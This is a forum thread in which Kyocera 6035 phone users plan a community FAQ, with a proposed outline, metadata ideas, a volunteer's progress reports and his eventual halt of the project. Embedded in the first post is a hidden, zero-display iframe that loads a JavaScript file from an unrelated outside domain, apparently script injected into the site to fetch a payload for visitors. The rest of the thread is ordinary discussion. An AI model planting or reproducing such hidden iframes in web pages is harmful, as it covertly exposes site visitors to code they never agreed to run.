+ Reply to Thread
Page 1 of 2 1 2 LastLast

We need an actual FAQ page for the 6035!

We are starting to get many more new users ever since the huge price drop of the phone occurred. Many people are joining asking many of the questions that have been asked way back in the beginning or a few months ago. It has become apparent that many don't think to do a search, but I also think there many terms and basic things that could be covered by a FAQ.<iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>

I'm one of these new people. I'm trying to not ask stupid questions but I'm new to palm tops, PalmOS, Kyocera, and brushing my teeth. :d

I guess if I was a nice guy, I'd keep track of my questions and the answers that I find and post them. I'll try and do that.

pedz

RikkiM

Another newbie

I'm another newbie to the Palm and 6035 stuff.

I'd love to see a FAQ and would definitely get good use from it. :d

Here's my wish list: links for ringers, applications, where to buy accessories, and accessory/applications reviews. :

Registered User All-Purpose Guru's Avatar
    We have a FAQ section; however, since it's just a plain discussion section, it tends to have too much discussion in it.

What we need is for one of the administrators to volunteer to moderate a group-- then, we set up a moderated group where people can post, but the moderator is very judicious about what actually goes into the group. That way, it's all facts and no conversation.

I'd volunteer myself, but I know I won't be able to do the job well with my current workload.

That way, instead of saying "use the search function" we can say "RTFFAQ".
    --apg

"Invention, my dear friends, is ninety-three percent perspiration, six percent electricity, four percent evaporation, and two percent butterscotch ripple." --W. Wonka

APG
    Excellent idea! I'll talk to Jimmyjoe about implementing this feature. I guess I can volunteer myself to moderate that also
    --Jazz--

If that's the choice, then someone has got to take the time to clean up the FAQ discussion board.

Registered User All-Purpose Guru's Avatar
    Naah, just rename it "FAQ discussion board".

Yah, that's the ticket...
    --apg

"Invention, my dear friends, is ninety-three percent perspiration, six percent electricity, four percent evaporation, and two percent butterscotch ripple." --W. Wonka

So how about it? Doesn't this board deserve a real FAQ?

So I see the question has been asked before I did it - (I'm not going to bother including a link to that thread, you know what I'm talking about!)

So looking back in this thread I see a motion, a second, and a volunteer to administrate - what do we need to do to get this bird off the ground? I mean honestly, the lack of a well organized FAQ is my only criticism with this board - weve got the people and the information, let's just start working on a CONSENSUS PROCESS where clear information can be posted - I think we'll all end up happier with the board, with the new people who come in, and probably with our phones, as well.

I'm willing to pitch in however I might be of use - I'm sure there are others as well, couldn't we divvy up some main FAQ sections to various members?

For your consideration...

[color=brown:2f8cd4c4e1]
    Okay, i wrote a really great proposal, and then I lost it while messing around trying to turn on HTML for this post. So here's the short version:

I propose the Administrators adopt a structure for the 6035 FAQ, parcel out the sections to trustworthy members who will collate everything that we think we know, and everything that we know we think regarding that topic, and who will then submit said topics bcak to the administrators who will, upon approval, post the information to a new FAQ section of the board.

I've come up with a structure to use as a starting point, I have no ego in this at all, rip it to shreds if you've got better ideas, but I wanted to put my mind where my mouth was and provide something to get the ball rolling.

Cheers
    [/color:2f8cd4c4e1]

PROPOSED STRUCTURE FOR 6035 FAQ

1.* ABOUT THIS BOARD

1.1.**** Mission

1.2.**** History

1.3.**** Ts &amp; Cs

2.* BASIC 6035 OPERATION

2.1.**** Telephone

2.1.1.******** Software/Firmware Version History

2.1.2.******** Ringtone Installation

2.1.3.******** Service Providers

2.1.3.1.** Verizon

2.1.3.1.1.********** Activation on Verizon

2.1.3.1.2.********** Activation of a SPRINT-Branded phone on Verizon

2.1.3.1.3.********** Upgrading Firmware with Verizon

2.1.3.2.** Sprint

2.1.3.2.1.********** Activation on Sprint

2.1.3.2.2.********** Upgrading Firmware with Sprint

2.1.3.3.** Others

2.2.**** Palm

2.2.1.******** OS/Firmware Version History

2.2.2.******** Desktop Software

2.2.3.******** Kyocera-Branded Desktop vs. Palm Desktop

2.2.4.******** Windows

2.2.4.1.** (?)Win 95/98

2.2.4.2.** (?) Win 2000/NT/ME

2.2.5.******** Macintosh

2.2.5.1.** OS 9

2.2.5.2.** OS X

2.2.6.******** Synchronization

2.2.6.1.** Hardware Configurations

2.2.6.1.1.********** Serial Cradle

2.2.6.1.2.********** USB/Serial Adaptors
    2.2.6.1.2.1.***************** Palm Connect
    2.2.6.1.2.2.***************** Kyocera-branded USB/Serial Converter
    2.2.6.1.2.3.***************** Keyspan

2.2.6.1.3.********** Infra-Red

2.2.6.1.4.********** Network

2.2.6.2.** Database Backup &amp; Restoration

2.2.7.******** Modem/Data Use (?) ( Frankly I have no idea if this should be a “palm” category or a “phone” category or perhaps its own category??)

2.2.8.******** Program Installation

2.2.8.1.** Process

2.2.8.2.** Recommended Programs

2.2.8.3.** Links

3.* ADVANCED 6035 OPERATION

3.1.**** Ringtone Creation

3.2.**** KWPST

3.2.1.******** Advanced Programming Access &amp; Features

3.2.2.******** Upgrading your firmware

3.2.3.******** Advanced backup &amp; restoration of your 6035

3.2.4.******** Startup Logo Creation

4.* EXTERNAL RESOURCES

4.1.**** Palm Software

4.2.**** 6035 Ringtones

4.3.**** Other Information Sources

Sounds like a great idea. A FAQ section using the above format (or something similar) should be of great use. I'm available if help is needed.
    This 'telephone' has too many shortcomings to be seriously considered as a means of communication. The device is inherently of no value to us. -- Western Union internal memo, 1876.

ive begun work on the faq on my site and will submit it to be incorporated into this site when its done.

right now im playing witht the layout and soon i'll start actually locating and placing content

http://6035.voicesinmyhead.net
    i'm still looking for KT1.1.19 if you have it webmaster@voicesinmyhead.net

i got a few articles done -BTW i stole the logo -since it will be coming back to this site i don't think anyone will care

http://6035.voicesinmyhead.net/

http://6035.voicesinmyhead.net/2.1.2.htm

http://6035.voicesinmyhead.net/2.2.8.1.htm

input is welcome

Nice Job!
    www.treobits.com
    (News, Internet Radio, Software/Hardware Store, Ringtones, Wallpaper, and more...)

Thanks DT for making some serious headway!

One suggestion I have is that each article have a "reference stamp" to help keep things current (or to help keep confident that things *are* in fact current, which is more likely to be the case based on the fact the 6035 in now "obsolete" )

If the information is put into predefined fields, it could also aid in searching/filtering of the FAQ, though the provision of new specific search perameters to hit those fields instead of the total article text.

Some items to "stamp" on eacH FAQ article:
    1) DATE WRITTEN
    2) AUTHOR/EDITOR/OWNER/WHATEVER-type person
    3) HARDWARE/SOFTWARE VERSIONS,*
    3a)Phone SW/FW Versions
    3b)Palm Desktop SW Version
    3c) PC Type &amp; Version
    3d) Other Periferal details (cables, graphics &amp; sound SW, whatever)

*(As relevant; either because the info is known to be somehow version-specfic or because it's not been proven otherwise, in the YMMV sense).

good idea -i was gonna lump all that together (more like a credits section) and add it to the end but this seems to be a much better way

FAQ/Consensus Building Process

This is really for the Administrators, I think...

I am excited to see that there is interest out there in helping to build a viable FAQ section to Augment this fantastic board. The work that DT alone has already put in is really valuable. While there are probably many people here who know enough about the 6035 to single-handedly build a very helpful FAQ document, with the impending release of the next generation, I think it is important to use [i:11ad2600ca]this[/i:11ad2600ca] opportunity to develop a workable mechanism for culling information from a very wide range of contributors. I've got two basic resaons for suggesting we make this harder than it needs to be:
    1) There's just a lot of information that's pretty much a one-liner, that will always stand independently from anything in an "article" format that is often warranted. E.G. :
    [quote:11ad2600ca]Kyocera USB-Serial Converter doesn’t work with OS X. (Model TXDTA0C01) There are working drivers provided with the cable for MAC OS9 (as well as for Windows)[/quote:11ad2600ca]
    2) I don't think we will want, as a community, to deal with the influx of newbie questions the same way as with the 6035. The solid facts on the the 7135 will be coming in in spits and dribbles for a long long time, it would be frustrating to wait until one person can amass enough knowledge to write a conclusive and comprehensive tome, and it would be inefficienct to build a document like that early, requiring frequent and significant rewrites.

So what is this all about? What am I getting at? Where am I coming from? What was I thinking leaving the house with that tie on?
    All good questions...
    Basically, I think it's imperative to determine a systematic way for a "living, breathing" FAQ to take in, review, and assimilate new information as it becomes available from members of the community. We've had the free-for-all approach, which created an unruly mess too difficult to navigate, but before DT burns too many braincells on the word processor I think we should realize that the answer isn't to go to the other extreme, of single-entity research, verification, writing, editing, and revising. (Once again, DT is doing really good stuff, I just want to make sure that it can be put to the best possible use as he hopefully continues.)

I ask myself again, what am I getting at??
    Right. Here's what we need. An easy, understandable, repeatable, sustainable method for all members to suggest information for inclusion in the FAQ. I believe part of this system would have to include a group of administrators, representing the different FAQ sections, with the responsibility of regularly review the suggestions and amending their subject accordingly. I also think that it is necessary to segment as much as possible the FAQ data, to make the review process as low-maintenance as possible. (One point of possibly relevant information shouldn't require an administrator to review several pages of documentation line-by-line). This would help each administrator, and just as important, it would ease the transition of responsibility from one person to the next.

Frankly, to my mind, that's all pretty straight-forward. The realy issue I'm wondering about is determining the best method for the users to present the information for review. What would really help would be some method of "flagging" individual posts when a reader comes accross one that seems the speak to the state of the art in terms of our accepted group knowledgebase. I don't think that function currently exists in this bb software, but it's an idea I had.

Sorry for the voluminous post, I guess iI forgot to take my medication...

Cheers, and thanks again to DT!!!

progress so far

alrighty i split the index up into chapters and changed to an external stylesheet

so far here is what i got:
    Main Site
    Installing/UnInstalling Ringtones
    Soft Reset
    Hard Reset
    Safe Reset
    Download Reset
    Process
    Recommended Programs

Im still gonna need a lot of help to finish this thing out (mostly with the verizon stuff and ringtone creation) and any other section you think we need to add

Looking Good DT!
    Very nice, clean style - how do you get your whites so white and your colors so vibrant?

Seriously, I would love to know your MO for coding - the results look great, and you seem to be churing the pages out so quickly...share with the young ones, master! (please?)

Any updates?

Hey guys,

Just wondering if anyone has yet written the "Upgrading your firmware" portion of the "Advanced 6035 Operation" section of the FAQ document.

There are bits and pieces of valuable information about this all over this forum, but haven't yet found it compiled in one place in one concise document.

Also hoping someone would be kind enough to share the lastest SX and KT files.... (last I heard it was SX 1.1.12 and KT 1.1.21 -- am I right?)

-Mary,
    (who's eagerly wants to upgrade her Smartphone!)
    breathlessly awaiting the 7135....

production halted

i have halted production on the faq due to the fact that the number of submissions voluntereed(0) was far less than expected
    perhaps a new topic(poll perhaps) is needed to determine if people can/will contribute to the FAQ.